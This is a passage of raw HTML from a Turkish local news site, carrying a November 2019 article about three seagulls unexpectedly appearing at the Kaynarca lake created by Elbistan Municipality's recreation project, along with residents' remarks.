href="http://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-7-bin-fidan-h64743.html" title="Elbistan’ın geleceğine 7 bin fidan" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/11/Ysimsiz-1_22.jpg" alt="Elbistan’ın geleceğine 7 bin fidan" class="pull-left" /> <div class="caption-line"><p>Elbistan’ın geleceğine 7 bin fidan</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanin-sultanlari-antalyasporu-ezdi-gecti-h64735.html" title="Elbistan’ın Sultanları, Antalyaspor’u ezdi geçti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/11/Ysimsiz-15.jpg" alt="Elbistan’ın Sultanları, Antalyaspor’u ezdi geçti" class="pull-left" /> <div class="caption-line"><p>Elbistan’ın Sultanları, Antalyaspor’u ezdi geçti</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/buyuk-onder-ataturk-saygiyla-anildi-h64734.html" title="Büyük Önder Atatürk, saygıyla anıldı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/11/Ysimsiz-14.jpg" alt="Büyük Önder Atatürk, saygıyla anıldı" class="pull-left" /> <div class="caption-line"><p>Büyük Önder Atatürk, saygıyla anıldı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/devletin-zirvesi-unal-in-mutlu-gununde-bulustu-h64724.html" title="Devletin zirvesi, Ünal&#039;ın mutlu gününde buluştu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/11/FB_IMG_1573240667870.jpg" alt="Devletin zirvesi, Ünal&#039;ın mutlu gününde buluştu" class="pull-left" /> <div class="caption-line"><p>Devletin zirvesi, Ünal'ın mutlu gününde...</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Kaynarca’nın yeni konukları martılar oldu</h1> <h2 class="lead" itemprop="description"><strong>Elbistan Belediyesi’nin rekreasyon projesi kapsamında göl haline getirilen Kaynarca’da görülen martılar, görenleri şaşkına çevirdi.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2019-11-11 18:04:03" content="2019-11-11T18:04:03+02:00">11 Kasım 2019 Pazartesi 18:04</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg" alt="Kaynarca’nın yeni konukları martılar oldu" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Türkiye’nin kıyı bölgelerinde yaşayan martıların yeni durağı, Ceyhan Nehri’nin kaynak noktalarından biri olan Kaynarca oldu. Nereden geldikleri belli olmayan 3 martı, Elbistan Belediyesi’nin başlattığı rekreasyon projesi ile göle dönüşen Kaynarca mevkiinde görülen martılar, vatandaşların da ilgisi ile karşılaştı. Kaynarca’yı yeni yuva olarak seçtikleri tahmin edilen martıları gören vatandaşlar, “Bu kuşların genelde deniz kenarında yaşadığını biliyoruz. İlk gördüğümüzde farklı bir tür sandık ama yakından incelediğimizde martı olduğunu anlayınca biz de şaşırdık. Buraya en yakın deniz kilometrelerce uzakta. Bu kuşların, göç yolundayken yeni oluşan göl alanını fark ettiklerini sanıyoruz. Yine de böyle bir güzelliğe gözlerimizle şahit olmak güzel. İnşallah, burayı yuva olarak seçerler ve Kaynarca ile Pınarbaşı’nın güzelliğine güzellik katarlar” diye konuştular.<br /> <br /> <img src="/images/upload/kaynarca martılar (2).jpg" width="640" height="360" alt="" /><img src="/images/upload/kaynarca martılar (3).jpg" width="640" height="355" alt="" /><img src="/images/upload/kaynarca martılar (4).jpg" width="640" height="391" alt="" /></span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;"><o:p></o:p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-7-bin-fidan-h64743.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bakis-mahallesinde-agaclandirma-seferberligi-h64744.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspor-farkli-yenildi-h64748.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dr-piskinden-gocere-ziyaret-h64747.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bahcesehir-kolejinde-nasil-basarili-oldum-paneli-h64746.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/aycan-firma-geregini-yapmali-h64745.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kocatepe-universitesi-ogr-uyesi-prof-dr-bahri-ersoy-dan-gazetemize-nezaket-ziyareti-h64741.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/park-halindeki-otomobile-carpti-3-yarali-h64738.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h64737.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-sultanlari-antalyasporu-ezdi-gecti-h64735.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/buyuk-onder-ataturk-saygiyla-anildi-h64734.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/pinarbasi-ilaclama-icin-kapatilacak-h64736.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bahcesehir-kolejinden-velilere-yeni-nesil-iletisim-semineri-h64733.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-kilic-tan-10-kasim-mesaji-h64731.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuzden-10-kasim-mesaji-h64730.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dinamit-ve-jeneratorle-define-arayisi-karakolda-bitti-h64729.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/dumlupinar-insanlarin-zehir-solumasina-karsi-harekete-gecilmeli-h64728.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kumar-denetiminde-3-sahsa-960-tl-ceza-h64727.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/devletin-zirvesi-unal-in-mutlu-gununde-bulustu-h64724.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobiller-koyun-surusune-daldi-h64723.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/15-yasindaki-cocuk-elektrik-akimina-kapildi-h64722.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-ile-kamyonet-koprude-carpisti-3-yarali-h64721.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ozdemir-sirket-filtre-konusunda-uzerine-duseni-yapmaliydi-h64712.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-7-bin-fidan-h64743.html" title="Elbistan’ın geleceğine 7 bin fidan"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/elbistanin_gelecegine_7_bin_fidan_h64743_dd65f.jpg" alt="Elbistan’ın geleceğine 7 bin fidan" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın geleceğine 7 bin fidan</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bakis-mahallesinde-agaclandirma-seferberligi-h64744.html" title="Bakış Mahallesi’nde ağaçlandırma seferberliği"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/bakis_mahallesinde_agaclandirma_seferberligi_h64744_0cf45.jpg" alt="Bakış Mahallesi’nde ağaçlandırma seferberliği" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bakış Mahallesi’nde ağaçlandırma seferberliği</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html" title="Kaynarca’nın yeni konukları martılar oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/kaynarcanin_yeni_konuklari_martilar_oldu_h64749_7699e.jpg" alt="Kaynarca’nın yeni konukları martılar oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaynarca’nın yeni konukları martılar oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-farkli-yenildi-h64748.html" title="Elbistanspor, farklı yenildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/elbistanspor_farkli_yenildi_h64748_920f0.jpg" alt="Elbistanspor, farklı yenildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor, farklı yenildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dr-piskinden-gocere-ziyaret-h64747.html" title="Dr. Pişkin’den Göçer’e ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/dr_piskinden_gocere_ziyaret_h64747_68a6b.jpg" alt="Dr. Pişkin’den Göçer’e ziyaret" /> <div class="carousel-caption"> <h2> <span style="font-size:">Dr. Pişkin’den Göçer’e ziyaret</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bahcesehir-kolejinde-nasil-basarili-oldum-paneli-h64746.html" title="Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/bahcesehir_kolejinde_nasil_basarili_oldum_paneli_h64746_17434.jpg" alt="Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/aycan-firma-geregini-yapmali-h64745.html" title="Aycan: “Firma, gereğini yapmalı”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/aycan_firma_geregini_yapmali_h64745_e7518.jpg" alt="Aycan: “Firma, gereğini yapmalı”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Aycan: “Firma, gereğini yapmalı”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html" title="Nesli tehlike altında olan vaşak, av tüfeği ile öldürüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/nesli_tehlike_altinda_olan_vasak_av_tufegi_ile_olduruldu_h64742_b5a3e.jpg" alt="Nesli tehlike altında olan vaşak, av tüfeği ile öldürüldü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nesli tehlike altında olan vaşak, av tüfeği ile öldürüldü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kocatepe-universitesi-ogr-uyesi-prof-dr-bahri-ersoy-dan-gazetemize-nezaket-ziyareti-h64741.html" title="Kocatepe Üniversitesi Öğr. Üyesi Prof. Dr. Bahri Ersoy&#039;dan gazetemize nezaket ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/kocatepe_universitesi_ogr_uyesi_prof_dr_bahri_ersoy_dan_gazetemize_nezaket_ziyareti_h64741_2c8f6.jpg" alt="Kocatepe Üniversitesi Öğr. Üyesi Prof. Dr. Bahri Ersoy&#039;dan gazetemize nezaket ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kocatepe Üniversitesi Öğr. Üyesi Prof. Dr. Bahri Ersoy&#039;dan gazetemize nezaket ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/park-halindeki-otomobile-carpti-3-yarali-h64738.html" title="Park halindeki otomobile çarptı: 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/park_halindeki_otomobile_carpti_3_h64738_0f571.jpg" alt="Park halindeki otomobile çarptı: 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Park halindeki otomobile çarptı: 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h64737.html" title="Otomobil elektrik direğine çarptı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/otomobil_elektirik_diregine_carpti_1_yarali_h64737_067cc.jpg" alt="Otomobil elektrik direğine çarptı: 1 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil elektrik direğine çarptı: 1 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-sultanlari-antalyasporu-ezdi-gecti-h64735.html" title="Elbistan’ın Sultanları, Antalyaspor’u ezdi geçti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/elbistanin_sultanlari_antalyasporu_ezdi_gecti_h64735_8ec47.jpg" alt="Elbistan’ın Sultanları, Antalyaspor’u ezdi geçti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ın Sultanları, Antalyaspor’u ezdi geçti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/buyuk-onder-ataturk-saygiyla-anildi-h64734.html" title="Büyük Önder Atatürk, saygıyla anıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/buyuk_onder_ataturk_saygiyla_anildi_h64734_17458.jpg" alt="Büyük Önder Atatürk, saygıyla anıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Büyük Önder Atatürk, saygıyla anıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/pinarbasi-ilaclama-icin-kapatilacak-h64736.html" title="Pınarbaşı ilaçlama için kapatılacak"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/pinarbasi_ilaclama_icin_kapatilacak_h64736_b716d.jpg" alt="Pınarbaşı ilaçlama için kapatılacak" /> <div class="carousel-caption"> <h2> <span style="font-size:">Pınarbaşı ilaçlama için kapatılacak</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bahcesehir-kolejinden-velilere-yeni-nesil-iletisim-semineri-h64733.html" title="Bahçeşehir Koleji’nden velilere ‘Yeni Nesil İletişim’ semineri"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/bahcesehir_kolejinden_velilere_yeni_nesil_iletisim_semineri_h64733_488ec.jpg" alt="Bahçeşehir Koleji’nden velilere ‘Yeni Nesil İletişim’ semineri" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bahçeşehir Koleji’nden velilere ‘Yeni Nesil İletişim’ semineri</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-kilic-tan-10-kasim-mesaji-h64731.html" title="Başkan Kılıç&#039;tan 10 Kasım mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/baskan_kilic_tan_10_kasim_mesaji_h64731_cd869.jpg" alt="Başkan Kılıç&#039;tan 10 Kasım mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Kılıç&#039;tan 10 Kasım mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuzden-10-kasim-mesaji-h64730.html" title="Başkan Gürbüz’den 10 Kasım mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/baskan_gurbuzden_10_kasim_mesaji_h64730_cbe58.jpg" alt="Başkan Gürbüz’den 10 Kasım mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz’den 10 Kasım mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dinamit-ve-jeneratorle-define-arayisi-karakolda-bitti-h64729.html" title="Dinamit ve jeneratörle define arayışı karakolda bitti"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/dinamit_ve_jeneratorle_define_arayisi_karakolda_bitti_h64729_c27af.jpg" alt="Dinamit ve jeneratörle define arayışı karakolda bitti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Dinamit ve jeneratörle define arayışı karakolda bitti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/dumlupinar-insanlarin-zehir-solumasina-karsi-harekete-gecilmeli-h64728.html" title="Dumlupınar, “İnsanların zehir solumasına karşı harekete geçilmeli”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/dumlupinar_insanlarin_zehir_solumasina_karsi_harekete_gecilmeli_h64728_2f6da.jpg" alt="Dumlupınar, “İnsanların zehir solumasına karşı harekete geçilmeli”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Dumlupınar, “İnsanların zehir solumasına karşı harekete geçilmeli”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kumar-denetiminde-3-sahsa-960-tl-ceza-h64727.html" title="Kumar denetiminde 3 şahsa 960 TL ceza"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/kumar_denetiminde_3_sahsa_960_tl_ceza_h64727_6fe75.jpg" alt="Kumar denetiminde 3 şahsa 960 TL ceza" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kumar denetiminde 3 şahsa 960 TL ceza</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/devletin-zirvesi-unal-in-mutlu-gununde-bulustu-h64724.html" title="Devletin zirvesi, Ünal&#039;ın mutlu gününde buluştu"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/devletin_zirvesi_unal_in_mutlu_gununde_bulustu_h64724_c846d.jpg" alt="Devletin zirvesi, Ünal&#039;ın mutlu gününde buluştu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Devletin zirvesi, Ünal&#039;ın mutlu gününde buluştu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobiller-koyun-surusune-daldi-h64723.html" title="Otomobiller koyun sürüsüne daldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/otomobiller_koyun_surusune_daldi_h64723_23979.jpg" alt="Otomobiller koyun sürüsüne daldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobiller koyun sürüsüne daldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/15-yasindaki-cocuk-elektrik-akimina-kapildi-h64722.html" title="15 yaşındaki çocuk elektrik akımına kapıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/15_yasindaki_cocuk_elektrik_akimina_kapildi_h64722_30a78.jpg" alt="15 yaşındaki çocuk elektrik akımına kapıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">15 yaşındaki çocuk elektrik akımına kapıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-ile-kamyonet-koprude-carpisti-3-yarali-h64721.html" title="Otomobil ile kamyonet köprüde çarpıştı: 3 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/otomobil_ile_kamyonet_koprude_carpisti_3_yarali_h64721_08fee.jpg" alt="Otomobil ile kamyonet köprüde çarpıştı: 3 yaralı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil ile kamyonet köprüde çarpıştı: 3 yaralı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ozdemir-sirket-filtre-konusunda-uzerine-duseni-yapmaliydi-h64712.html" title="Özdemir, “Şirket, filtre konusunda üzerine düşeni yapmalıydı”"> <img src="http://www.elbistaninsesi.com/images/haberler/2019/11/ozdemir_sirket_filtre_konusunda_uzerine_duseni_yapmaliydi_h64712_e24b1.jpg" alt="Özdemir, “Şirket, filtre konusunda üzerine düşeni yapmalıydı”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özdemir, “Şirket, filtre konusunda üzerine düşeni yapmalıydı”</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(64749);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="64749" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="5f97e8ae23d371a82d7ffe3c7c9d7f21e359fe1e" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/kaynarcanin-yeni-konuklari-martilar-oldu-h64749.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspor-farkli-yenildi-h64748.html" title="Elbistanspor, farklı yenildi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanspor_farkli_yenildi_h64748_920f0.jpg" alt="Elbistanspor, farklı yenildi" /> <span>Elbistanspor, farklı yenildi</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/dr-piskinden-gocere-ziyaret-h64747.html" title="Dr. Pişkin’den Göçer’e ziyaret"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/dr_piskinden_gocere_ziyaret_h64747_68a6b.jpg" alt="Dr. Pişkin’den Göçer’e ziyaret" /> <span>Dr. Pişkin’den Göçer’e ziyaret</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/bahcesehir-kolejinde-nasil-basarili-oldum-paneli-h64746.html" title="Bahçeşehir Koleji’nde 